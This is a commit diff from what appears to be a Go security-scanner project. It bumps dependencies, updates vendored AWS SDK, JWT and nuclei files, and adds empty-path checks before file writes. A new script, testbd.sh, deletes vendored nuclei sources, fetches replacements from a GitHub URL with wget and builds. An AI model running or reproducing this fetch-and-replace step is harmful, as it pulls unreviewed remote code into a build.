105	106		github.com/antchfx/xpath v1.2.1 h1:qhp4EW6aCOVr5XIkT+l6LJ9ck/JsUH/yyauNgTQkBF8=
106	107		github.com/antchfx/xpath v1.2.1/go.mod h1:i54GszH55fYfBmoZXapTHN8T8tkcHfRgLyVwwqzXNcs=
		skipped 13 lines
120	121		github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw=
121	122		github.com/aws/aws-sdk-go v1.20.6/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
122	123		github.com/aws/aws-sdk-go v1.44.60/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
123		-	github.com/aws/aws-sdk-go v1.44.77 h1:m5rTfdv04/swD+vTuS2zn4NEwKX3yEJPMhiVCFDL/mU=
124		-	github.com/aws/aws-sdk-go v1.44.77/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
	124	+	github.com/aws/aws-sdk-go v1.44.83 h1:7+Rtc2Eio6EKUNoZeMV/IVxzVrY5oBQcNPtCcgIHYJA=
	125	+	github.com/aws/aws-sdk-go v1.44.83/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
125	126		github.com/aybabtme/rgbterm v0.0.0-20170906152045-cc83f3b3ce59/go.mod h1:q/89r3U2H7sSsE2t6Kca0lfwTK8JdoNGS/yzM/4iH5I=
126	127		github.com/aymerick/douceur v0.2.0 h1:Mv+mAeH1Q+n9Fr+oyamOlAkUNPWPlA8PPGR0QAaYuPk=
127	128		github.com/aymerick/douceur v0.2.0/go.mod h1:wlT5vV2O3h55X9m7iVYN0TBM0NH/MmbLnd30/FjWUq4=
		skipped 152 lines
280	281		github.com/gogf/gf v1.16.6 h1:Yp5YfwnGz41d1tiVqxcWXiPXyuzjTb7ax4SnPSXxDE8=
281	282		github.com/gogf/gf v1.16.6/go.mod h1:4LoHfEBl2jbVmZpVx+qk2La3zWr1V315FtF2PVZuyQ8=
282	283		github.com/golang-jwt/jwt v3.2.1+incompatible/go.mod h1:8pz2t5EyA70fFQQSrl6XZXzqecmYZeUEB8OUGHkxJ+I=
283		-	github.com/golang-jwt/jwt/v4 v4.3.0 h1:kHL1vqdqWNfATmA0FNMdmZNMyZI1U6O31X4rlIPoBog=
284	284		github.com/golang-jwt/jwt/v4 v4.3.0/go.mod h1:/xlHOz8bRuivTWchD4jCa+NbatV+wEUSzwAxVc6locg=
	285	+	github.com/golang-jwt/jwt/v4 v4.4.2 h1:rcc4lwaZgFMCZ5jxF9ABolDcIHdBytAFgqFPbSJQAYs=
	286	+	github.com/golang-jwt/jwt/v4 v4.4.2/go.mod h1:m21LjoU+eqJr34lmDMbreY2eSTRJ1cv77w39/MY0Ch0=
285	287		github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
286	288		github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
287	289		github.com/golang-sql/sqlexp v0.1.0 h1:ZCD6MBpcuOVfGVqsEmY5/4FtYiKz6tSyUv9LPEDei6A=
		skipped 434 lines
722	724		github.com/projectdiscovery/nuclei-updatecheck-api v0.0.0-20220726130814-981d44a34f84/go.mod h1:l7yVNUvTqLvwhwnGa/T28457Y/axOoXPOPbNen/Jmpg=
723	725		github.com/projectdiscovery/nuclei/v2 v2.5.1/go.mod h1:sU2qcY0MQFS0CqP1BgkR8ZnUyFhqK0BdnY6bvTKNjXY=
724	726		github.com/projectdiscovery/nuclei/v2 v2.7.5/go.mod h1:Gi6c6b8NJMi9QO5salpFv/n3TlcERP49hCYxIiwFfQM=
725		-	github.com/projectdiscovery/nuclei/v2 v2.7.6 h1:rjjHwfPWjoA0Xp9k/de6Ln1W+diZMbIrFSDaGSF2TQU=
726		-	github.com/projectdiscovery/nuclei/v2 v2.7.6/go.mod h1:7JMjz2Knf4D0sWvQl34NEMrzBaRYEzeP9jGgqtlM0LM=
	727	+	github.com/projectdiscovery/nuclei/v2 v2.7.7 h1:1gGoyvrsuhTDOKbImHzN7FVNLHDgSwLQwF97swHhL8k=
	728	+	github.com/projectdiscovery/nuclei/v2 v2.7.7/go.mod h1:+zvCdPrVWS8EjUCy9NEWWaPANjaqodoD4rucSJpRo40=
727	729		github.com/projectdiscovery/nvd v1.0.9-0.20220314070650-d4a214c1f87d/go.mod h1:nGHAo7o6G4V4kscZlm488qKp/ZrZYiBoKqAQrn3X4Og=
728	730		github.com/projectdiscovery/rawhttp v0.0.7/go.mod h1:PQERZAhAv7yxI/hR6hdDPgK1WTU56l204BweXrBec+0=
729	731		github.com/projectdiscovery/rawhttp v0.0.8-0.20220526170355-03de6bb78f37/go.mod h1:kulxvr2aKZPB6jhq4ZQn/E+ArwRWczs1O6b1ZdcZAxo=
		skipped 19 lines
749	751		github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
750	752		github.com/projectdiscovery/stringsutil v0.0.0-20220120150443-138d7af18587/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
751	753		github.com/projectdiscovery/stringsutil v0.0.0-20220422150559-b54fb5dc6833/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
	754	+	github.com/projectdiscovery/stringsutil v0.0.0-20220612082425-0037ce9f89f3 h1:EbP+rVR7NPsFKfwhzshmXP2GMjqBpaMZurJzQ5PYvbY=
752	755		github.com/projectdiscovery/stringsutil v0.0.0-20220612082425-0037ce9f89f3/go.mod h1:mF5sh4jTghoGWwgUb9qWi5waTFklClDbtrqtJU93awc=
753		-	github.com/projectdiscovery/stringsutil v0.0.0-20220712170325-48c50c332cb4 h1:vm7ckAKkqFkJfh2+yYYW/Xr+GS2prGpQ4JlbwKkf4lU=
754		-	github.com/projectdiscovery/stringsutil v0.0.0-20220712170325-48c50c332cb4/go.mod h1:32NYmKyHkKsmisAOAaWrR15lz2ysz2M8x3KMeeoRHoU=
755	756		github.com/projectdiscovery/subfinder/v2 v2.5.2 h1:LER32P30jaYgaKN1N0b++bympCGBvKXmhw2SWZUg0w4=
756	757		github.com/projectdiscovery/subfinder/v2 v2.5.2/go.mod h1:W6FHvG0NFhj45HzYB9SGWwg4XMTBupahzDTShJvcw+Q=
757	758		github.com/projectdiscovery/uncover v0.0.5 h1:x6+96/5WwHhZxkWubTnUdNmoGdg/UIO2rwkL9VOxwmk=
		skipped 2 lines
760	761		github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1 h1:9dYmONRtwy+xP8UAGHxEQ0cxO3umc9qiFmnYsoDUps4=
761	762		github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1/go.mod h1:oXLErqOpqEAp/ueQlknysFxHO3CUNoSiDNnkiHG+Jpo=
762	763		github.com/projectdiscovery/wappalyzergo v0.0.51/go.mod h1:1LQBGQVW47tMHxGTxmBK+pAwfsWKSLQMXt/egxGlljo=
763		-	github.com/projectdiscovery/wappalyzergo v0.0.55 h1:dDWuohTrAUWrphnFB+uAL33QrDWBbdM+z7sTzSxy8PY=
764		-	github.com/projectdiscovery/wappalyzergo v0.0.55/go.mod h1:9aSADdt5z/pw9LFZF7Q8RrLnkyqZl1H4Ezivi8Td7l0=
	764	+	github.com/projectdiscovery/wappalyzergo v0.0.57 h1:/QDYw6qEZfTelMzRaTuhIVSVImmUJlvizCHWo/MTeU4=
	765	+	github.com/projectdiscovery/wappalyzergo v0.0.57/go.mod h1:9aSADdt5z/pw9LFZF7Q8RrLnkyqZl1H4Ezivi8Td7l0=
765	766		github.com/projectdiscovery/yamldoc-go v1.0.2/go.mod h1:7uSxfMXaBmzvw8m5EhOEjB6nhz0rK/H9sUjq1ciZu24=
766	767		github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6 h1:DvWRQpw7Ib2CRL3ogYm/BWM+X0UGPfz1n9Ix9YKgFM8=
767	768		github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6/go.mod h1:8OfZj8p/axkUM/TJoS/O9LDjj/S8u17rxRbqluE9CU4=
		skipped 143 lines
911	912		github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0/go.mod h1:IXCdmsXIht47RaVFLEdVnh1t+pgYtTAhQGj73kz+2DM=
912	913		github.com/xanzy/go-gitlab v0.50.3/go.mod h1:Q+hQhV508bDPoBijv7YjK/Lvlb4PhVhJdKqXVQrUoAE=
913	914		github.com/xanzy/go-gitlab v0.69.0/go.mod h1:o4yExCtdaqlM8YGdDJWuZoBmfxBsmA9TPEjs9mx1UO4=
914		-	github.com/xanzy/go-gitlab v0.72.0 h1:/9BQTftUE7GRK/RO1eeWxG1cOE+tjwBrvRdpkeSOq6w=
915		-	github.com/xanzy/go-gitlab v0.72.0/go.mod h1:d/a0vswScO7Agg1CZNz15Ic6SSvBG9vfw8egL99t4kA=
	915	+	github.com/xanzy/go-gitlab v0.73.1 h1:UMagqUZLJdjss1SovIC+kJCH4k2AZWXl58gJd38Y/hI=
	916	+	github.com/xanzy/go-gitlab v0.73.1/go.mod h1:d/a0vswScO7Agg1CZNz15Ic6SSvBG9vfw8egL99t4kA=
916	917		github.com/xdg-go/pbkdf2 v1.0.0 h1:Su7DPu48wXMwC3bs7MCNG+z4FhcyEuz5dlvchbq0B0c=
917	918		github.com/xdg-go/pbkdf2 v1.0.0/go.mod h1:jrpuAogTd400dnrH08LKmI/xc1MbPOebTwRqcT5RDeI=
918	919		github.com/xdg-go/scram v1.0.2 h1:akYIkZ28e6A96dkWNJQu3nmCzH3YfwMPQExUYDaRv7w=
		skipped 175 lines
1094	1095		golang.org/x/net v0.0.0-20200528225125-3c3fba18258b/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
1095	1096		golang.org/x/net v0.0.0-20200625001655-4c5254603344/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
1096	1097		golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
1097		-	golang.org/x/net v0.0.0-20200813134508-3edf25e44fcc/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
1098	1098		golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
1099	1099		golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
1100	1100		golang.org/x/net v0.0.0-20201031054903-ff519b6c9102/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
		skipped 21 lines
1122	1122		golang.org/x/net v0.0.0-20220520000938-2e3eb7b945c2/go.mod h1:CfG3xpIq0wQ8r1q4Su4UZFWDARRcnwPjda9FqA0JpMk=
1123	1123		golang.org/x/net v0.0.0-20220615171555-694bf12d69de/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
1124	1124		golang.org/x/net v0.0.0-20220630215102-69896b714898/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
1125		-	golang.org/x/net v0.0.0-20220812174116-3211cb980234 h1:RDqmgfe7SvlMWoqC3xwQ2blLO3fcWcxMa3eBLRdRW7E=
1126		-	golang.org/x/net v0.0.0-20220812174116-3211cb980234/go.mod h1:YDH+HFinaLZZlnHAfSS6ZXJJ9M9t4Dl22yv3iI2vPwk=
	1125	+	golang.org/x/net v0.0.0-20220826154423-83b083e8dc8b h1:ZmngSVLe/wycRns9MKikG9OWIEjGcGAkacif7oYQaUY=
	1126	+	golang.org/x/net v0.0.0-20220826154423-83b083e8dc8b/go.mod h1:YDH+HFinaLZZlnHAfSS6ZXJJ9M9t4Dl22yv3iI2vPwk=
1127	1127		golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
1128	1128		golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
1129	1129		golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
		skipped 90 lines
1220	1220		golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
1221	1221		golang.org/x/sys v0.0.0-20220114195835-da31bd327af9/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
1222	1222		golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
	1223	+	golang.org/x/sys v0.0.0-20220330033206-e17cdc41300f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
1223	1224		golang.org/x/sys v0.0.0-20220412211240-33da011f77ad/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
1224	1225		golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
1225	1226		golang.org/x/sys v0.0.0-20220627191245-f75cf1eec38b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
		skipped 243 lines

■ ■ ■ ■ ■ ■

pkg/fingerprint/fgConst.go

		skipped 146 lines
147	147		MergeReqUrl()
148	148		var err error
149	149		tempInput1, err = ioutil.TempFile("", "dict-in-*")
150		-	if nil == err {
	150	+	if nil == err && "" != tempInput1.Name() {
151	151		ioutil.WriteFile(tempInput1.Name(), []byte(strings.Join(FgUrls, "\n")), 0644)
152	152		FgDictFile = tempInput1.Name()
153	153		} else {
		skipped 14 lines

■ ■ ■ ■ ■ ■

pkg/naabu/v2/pkg/runner/targets.go

		skipped 171 lines
172	172		a = nil
173	173		aR = util.RemoveDuplication_map(aR)
174	174		//log.Printf("DoTargets:: %+v", aR)
175		-	err = ioutil.WriteFile(r.targetsFile, []byte(strings.Join(aR, "\n")), os.ModePerm)
176		-	if nil != err {
177		-	log.Println("ioutil.WriteFile(r.targetsFile err: ", err)
	175	+	if "" != r.targetsFile {
	176	+	err = ioutil.WriteFile(r.targetsFile, []byte(strings.Join(aR, "\n")), os.ModePerm)
	177	+	if nil != err {
	178	+	log.Println("ioutil.WriteFile(r.targetsFile err: ", err)
	179	+	}
178	180		}
179	181		// 有nmap那么就直接调用nmap了
180	182		bRw := false
		skipped 27 lines
208	210		util.TmpFile[string(util.Naabu)] = []*os.File{tempInput1}
209	211		hydra.DoNmapRst(&Naabubuffer)
210	212		defer r.Close()
211		-	ioutil.WriteFile(r.targetsFile, []byte(""), os.ModePerm)
	213	+	if "" != r.targetsFile {
	214	+	ioutil.WriteFile(r.targetsFile, []byte(""), os.ModePerm)
	215	+	}
212	216		log.Println("do namp over naabu ")
213	217		return true, nil
214	218		//} else {
		skipped 11 lines
226	230		} else {
227	231		log.Println(" pkg.CheckHvNmap() false")
228	232		}
229		-	if bRw {
	233	+	if bRw && "" != r.targetsFile {
230	234		ioutil.WriteFile(r.targetsFile, []byte(strings.Join(aR, "\n")), os.ModePerm)
231	235		}
232	236		return false, nil
		skipped 205 lines

■ ■ ■ ■ ■ ■

spider/catch_http.go

		skipped 109 lines
110	110		}
111	111
112	112		// 保存文件
113		-	if err := ioutil.WriteFile(path, buf, 0644); err != nil {
114		-	return false
	113	+	if "" != path {
	114	+	if err := ioutil.WriteFile(path, buf, 0644); err != nil {
	115	+	return false
	116	+	}
115	117		}
116	118
117	119		return true
		skipped 190 lines

■ ■ ■ ■ ■ ■

testbd.sh

1	+	rm -rf vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
2	+	rm -rf vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh/interactsh.go
3	+	wget -c -O vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go https://github.com/hktalent/scan4all/raw/main/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
4	+	wget -c -O vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh/interactsh.go https://github.com/hktalent/scan4all/raw/main/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh/interactsh.go
5	+	go build
6	+

■ ■ ■ ■ ■ ■

vendor/github.com/andygrunwald/go-jira/Makefile

		skipped 17 lines
18	18
19	19		.PHONY: staticcheck
20	20		staticcheck: ## Runs static analysis to prevend bugs, foster code simplicity, performance and editor integration.
21		-	go get -u honnef.co/go/tools/cmd/staticcheck
	21	+	go install honnef.co/go/tools/cmd/staticcheck@2022.1
22	22		staticcheck ./...
23	23
24	24		.PHONY: all
		skipped 2 lines

■ ■ ■ ■ ■ ■

vendor/github.com/antchfx/xmlquery/parse.go

		skipped 201 lines
202	202		// First, normalize the cache...
203	203		cached := strings.ToUpper(string(p.reader.Cache()))
204	204		nodeType := TextNode
205		-	if strings.HasPrefix(cached, "<![CDATA[") {
	205	+	if strings.HasPrefix(cached, "<![CDATA[") \|\| strings.HasPrefix(cached, "![CDATA[") {
206	206		nodeType = CharDataNode
207	207		}
208	208
		skipped 163 lines

■ ■ ■ ■ ■ ■

vendor/github.com/aws/aws-sdk-go/aws/endpoints/defaults.go

		skipped 1677 lines
1678	1678		Region: "ap-southeast-2",
1679	1679		}: endpoint{},
1680	1680		endpointKey{
	1681	+	Region: "ap-southeast-3",
	1682	+	}: endpoint{},
	1683	+	endpointKey{
1681	1684		Region: "ca-central-1",
1682	1685		}: endpoint{},
1683	1686		endpointKey{
		skipped 2243 lines
3927	3930		}: endpoint{},
3928	3931		endpointKey{
3929	3932		Region: "ap-southeast-2",
	3933	+	}: endpoint{},
	3934	+	endpointKey{
	3935	+	Region: "ap-southeast-3",
3930	3936		}: endpoint{},
3931	3937		endpointKey{
3932	3938		Region: "ca-central-1",
		skipped 8992 lines
12925	12931		Deprecated: boxedTrue,
12926	12932		},
12927	12933		endpointKey{
	12934	+	Region: "me-central-1-fips",
	12935	+	}: endpoint{
	12936	+	Hostname: "kms-fips.me-central-1.amazonaws.com",
	12937	+	CredentialScope: credentialScope{
	12938	+	Region: "me-central-1",
	12939	+	},
	12940	+	Deprecated: boxedTrue,
	12941	+	},
	12942	+	endpointKey{
12928	12943		Region: "me-south-1",
12929	12944		}: endpoint{},
12930	12945		endpointKey{
		skipped 5339 lines
18270	18285		Region: "ap-southeast-2",
18271	18286		}: endpoint{},
18272	18287		endpointKey{
	18288	+	Region: "ap-southeast-3",
	18289	+	}: endpoint{},
	18290	+	endpointKey{
18273	18291		Region: "ca-central-1",
18274	18292		}: endpoint{},
18275	18293		endpointKey{
		skipped 3735 lines
22011	22029		},
22012	22030		},
22013	22031		},
	22032	+	"supportapp": service{
	22033	+	Endpoints: serviceEndpoints{
	22034	+	endpointKey{
	22035	+	Region: "eu-west-1",
	22036	+	}: endpoint{},
	22037	+	endpointKey{
	22038	+	Region: "us-east-1",
	22039	+	}: endpoint{},
	22040	+	endpointKey{
	22041	+	Region: "us-west-2",
	22042	+	}: endpoint{},
	22043	+	},
	22044	+	},
22014	22045		"swf": service{
22015	22046		Endpoints: serviceEndpoints{
22016	22047		endpointKey{
		skipped 2447 lines
24464	24495		}: endpoint{},
24465	24496		endpointKey{
24466	24497		Region: "ap-southeast-2",
	24498	+	}: endpoint{},
	24499	+	endpointKey{
	24500	+	Region: "ca-central-1",
	24501	+	}: endpoint{},
	24502	+	endpointKey{
	24503	+	Region: "eu-central-1",
24467	24504		}: endpoint{},
24468	24505		endpointKey{
24469	24506		Region: "eu-west-1",
24470	24507		}: endpoint{},
24471	24508		endpointKey{
	24509	+	Region: "eu-west-2",
	24510	+	}: endpoint{},
	24511	+	endpointKey{
24472	24512		Region: "us-east-1",
24473	24513		}: endpoint{},
24474	24514		endpointKey{
		skipped 6795 lines
31270	31310		},
31271	31311		},
31272	31312		},
	31313	+	"wellarchitected": service{
	31314	+	Endpoints: serviceEndpoints{
	31315	+	endpointKey{
	31316	+	Region: "us-gov-east-1",
	31317	+	}: endpoint{},
	31318	+	endpointKey{
	31319	+	Region: "us-gov-west-1",
	31320	+	}: endpoint{},
	31321	+	},
	31322	+	},
31273	31323		"workspaces": service{
31274	31324		Endpoints: serviceEndpoints{
31275	31325		endpointKey{
		skipped 144 lines
31420	31470		},
31421	31471		"appconfigdata": service{
31422	31472		Endpoints: serviceEndpoints{
	31473	+	endpointKey{
	31474	+	Region: "us-iso-east-1",
	31475	+	}: endpoint{},
31423	31476		endpointKey{
31424	31477		Region: "us-iso-west-1",
31425	31478		}: endpoint{},
		skipped 749 lines
32175	32228		}: endpoint{},
32176	32229		},
32177	32230		},
	32231	+	"appconfigdata": service{
	32232	+	Endpoints: serviceEndpoints{
	32233	+	endpointKey{
	32234	+	Region: "us-isob-east-1",
	32235	+	}: endpoint{},
	32236	+	},
	32237	+	},
32178	32238		"application-autoscaling": service{
32179	32239		Defaults: endpointDefaults{
32180	32240		defaultKey{}: endpoint{
		skipped 307 lines
32488	32548		},
32489	32549		},
32490	32550		"logs": service{
	32551	+	Endpoints: serviceEndpoints{
	32552	+	endpointKey{
	32553	+	Region: "us-isob-east-1",
	32554	+	}: endpoint{},
	32555	+	},
	32556	+	},
	32557	+	"metering.marketplace": service{
	32558	+	Defaults: endpointDefaults{
	32559	+	defaultKey{}: endpoint{
	32560	+	CredentialScope: credentialScope{
	32561	+	Service: "aws-marketplace",
	32562	+	},
	32563	+	},
	32564	+	},
32491	32565		Endpoints: serviceEndpoints{
32492	32566		endpointKey{
32493	32567		Region: "us-isob-east-1",
		skipped 170 lines

■ ■ ■ ■ ■ ■

vendor/github.com/aws/aws-sdk-go/aws/version.go

		skipped 4 lines
5	5		const SDKName = "aws-sdk-go"
6	6
7	7		// SDKVersion is the version of this SDK
8		-	const SDKVersion = "1.44.77"
	8	+	const SDKVersion = "1.44.83"
9	9

■ ■ ■ ■ ■ ■

vendor/github.com/golang-jwt/jwt/v4/README.md

		skipped 35 lines
36	36
37	37		This library supports the parsing and verification as well as the generation and signing of JWTs. Current supported signing algorithms are HMAC SHA, RSA, RSA-PSS, and ECDSA, though hooks are present for adding your own.
38	38
	39	+	## Installation Guidelines
	40	+
	41	+	1. To install the jwt package, you first need to have [Go](https://go.dev/doc/install) installed, then you can use the command below to add `jwt-go` as a dependency in your Go program.
	42	+
	43	+	```sh
	44	+	go get -u github.com/golang-jwt/jwt/v4
	45	+	```
	46	+
	47	+	2. Import it in your code:
	48	+
	49	+	```go
	50	+	import "github.com/golang-jwt/jwt/v4"
	51	+	```
	52	+
39	53		## Examples
40	54
41		-	See [the project documentation](https://pkg.go.dev/github.com/golang-jwt/jwt) for examples of usage:
	55	+	See [the project documentation](https://pkg.go.dev/github.com/golang-jwt/jwt/v4) for examples of usage:
42	56
43	57		* [Simple example of parsing and validating a token](https://pkg.go.dev/github.com/golang-jwt/jwt#example-Parse-Hmac)
44	58		* [Simple example of building and signing a token](https://pkg.go.dev/github.com/golang-jwt/jwt#example-New-Hmac)
		skipped 1 lines
46	60
47	61		## Extensions
48	62
49		-	This library publishes all the necessary components for adding your own signing methods. Simply implement the `SigningMethod` interface and register a factory method using `RegisterSigningMethod`.
	63	+	This library publishes all the necessary components for adding your own signing methods or key functions. Simply implement the `SigningMethod` interface and register a factory method using `RegisterSigningMethod` or provide a `jwt.Keyfunc`.
50	64
51		-	A common use case would be integrating with different 3rd party signature providers, like key management services from various cloud providers or Hardware Security Modules (HSMs).
	65	+	A common use case would be integrating with different 3rd party signature providers, like key management services from various cloud providers or Hardware Security Modules (HSMs) or to implement additional standards.
52	66
53		-	\| Extension \| Purpose \| Repo \|
54		-	\|-----------\|----------------------------------------------------------------------------------------------\|--------------------------------------------\|
55		-	\| GCP \| Integrates with multiple Google Cloud Platform signing tools (AppEngine, IAM API, Cloud KMS) \| https://github.com/someone1/gcp-jwt-go \|
56		-	\| AWS \| Integrates with AWS Key Management Service, KMS \| https://github.com/matelang/jwt-go-aws-kms \|
	67	+	\| Extension \| Purpose \| Repo \|
	68	+	\| --------- \| -------------------------------------------------------------------------------------------------------- \| ------------------------------------------ \|
	69	+	\| GCP \| Integrates with multiple Google Cloud Platform signing tools (AppEngine, IAM API, Cloud KMS) \| https://github.com/someone1/gcp-jwt-go \|
	70	+	\| AWS \| Integrates with AWS Key Management Service, KMS \| https://github.com/matelang/jwt-go-aws-kms \|
	71	+	\| JWKS \| Provides support for JWKS ([RFC 7517](https://datatracker.ietf.org/doc/html/rfc7517)) as a `jwt.Keyfunc` \| https://github.com/MicahParks/keyfunc \|
57	72
58	73		Disclaimer: Unless otherwise specified, these integrations are maintained by third parties and should not be considered as a primary offer by any of the mentioned cloud providers
59	74
		skipped 65 lines

■ ■ ■ ■ ■ ■

vendor/github.com/golang-jwt/jwt/v4/SECURITY.md

1	+	# Security Policy
2	+
3	+	## Supported Versions
4	+
5	+	As of February 2022 (and until this document is updated), the latest version `v4` is supported.
6	+
7	+	## Reporting a Vulnerability
8	+
9	+	If you think you found a vulnerability, and even if you are not sure, please report it to [email protected] or one of the other [golang-jwt maintainers](https://github.com/orgs/golang-jwt/people). Please try be explicit, describe steps to reproduce the security issue with code example(s).
10	+
11	+	You will receive a response within a timely manner. If the issue is confirmed, we will do our best to release a patch as soon as possible given the complexity of the problem.
12	+
13	+	## Public Discussions
14	+
15	+	Please avoid publicly discussing a potential security vulnerability.
16	+
17	+	Let's take this offline and find a solution first, this limits the potential impact as much as possible.
18	+
19	+	We appreciate your help!
20	+

■ ■ ■ ■ ■ ■

vendor/github.com/golang-jwt/jwt/v4/claims.go

		skipped 55 lines
56	56		// default value in Go, let's not fail the verification for them.
57	57		if !c.VerifyExpiresAt(now, false) {
58	58		delta := now.Sub(c.ExpiresAt.Time)
59		-	vErr.Inner = fmt.Errorf("%s by %v", delta, ErrTokenExpired)
	59	+	vErr.Inner = fmt.Errorf("%s by %s", ErrTokenExpired, delta)
60	60		vErr.Errors \|= ValidationErrorExpired
61	61		}
62	62
		skipped 86 lines
149	149		// default value in Go, let's not fail the verification for them.
150	150		if !c.VerifyExpiresAt(now, false) {
151	151		delta := time.Unix(now, 0).Sub(time.Unix(c.ExpiresAt, 0))
152		-	vErr.Inner = fmt.Errorf("%s by %v", delta, ErrTokenExpired)
	152	+	vErr.Inner = fmt.Errorf("%s by %s", ErrTokenExpired, delta)
153	153		vErr.Errors \|= ValidationErrorExpired
154	154		}
155	155
		skipped 119 lines

■ ■ ■ ■ ■ ■

vendor/github.com/golang-jwt/jwt/v4/rsa_pss.go

	1	+	//go:build go1.4
1	2		// +build go1.4
2	3
3	4		package jwt
		skipped 140 lines

■ ■ ■ ■ ■ ■

vendor/github.com/golang-jwt/jwt/v4/token.go

		skipped 6 lines
7	7		"time"
8	8		)
9	9
10		-
11	10		// DecodePaddingAllowed will switch the codec used for decoding JWTs respectively. Note that the JWS RFC7515
12	11		// states that the tokens will utilize a Base64url encoding with no padding. Unfortunately, some implementations
13	12		// of JWT are producing non-standard tokens, and thus require support for decoding. Note that this is a global
		skipped 116 lines

■ ■ ■ ■ ■ ■

vendor/github.com/golang-jwt/jwt/v4/types.go

		skipped 52 lines
53	53		if TimePrecision < time.Second {
54	54		prec = int(math.Log10(float64(time.Second) / float64(TimePrecision)))
55	55		}
56		-	f := float64(date.Truncate(TimePrecision).UnixNano()) / float64(time.Second)
	56	+	truncatedDate := date.Truncate(TimePrecision)
57	57
58		-	return []byte(strconv.FormatFloat(f, 'f', prec, 64)), nil
	58	+	// For very large timestamps, UnixNano would overflow an int64, but this
	59	+	// function requires nanosecond level precision, so we have to use the
	60	+	// following technique to get round the issue:
	61	+	// 1. Take the normal unix timestamp to form the whole number part of the
	62	+	// output,
	63	+	// 2. Take the result of the Nanosecond function, which retuns the offset
	64	+	// within the second of the particular unix time instance, to form the
	65	+	// decimal part of the output
	66	+	// 3. Concatenate them to produce the final result
	67	+	seconds := strconv.FormatInt(truncatedDate.Unix(), 10)
	68	+	nanosecondsOffset := strconv.FormatFloat(float64(truncatedDate.Nanosecond())/float64(time.Second), 'f', prec, 64)
	69	+
	70	+	output := append([]byte(seconds), []byte(nanosecondsOffset)[1:]...)
	71	+
	72	+	return output, nil
59	73		}
60	74
61	75		// UnmarshalJSON is an implementation of the json.RawMessage interface and deserializses a
		skipped 71 lines

■ ■ ■ ■ ■ ■

vendor/github.com/projectdiscovery/nuclei/v2/pkg/catalog/config/config.go

		skipped 27 lines
28	28		const nucleiConfigFilename = ".templates-config.json"
29	29
30	30		// Version is the current version of nuclei
31		-	const Version = `2.7.6`
	31	+	const Version = `2.7.7`
	32	+
	33	+	var customConfigDirectory string
32	34
	35	+	func SetCustomConfigDirectory(dir string) {
	36	+	customConfigDirectory = dir
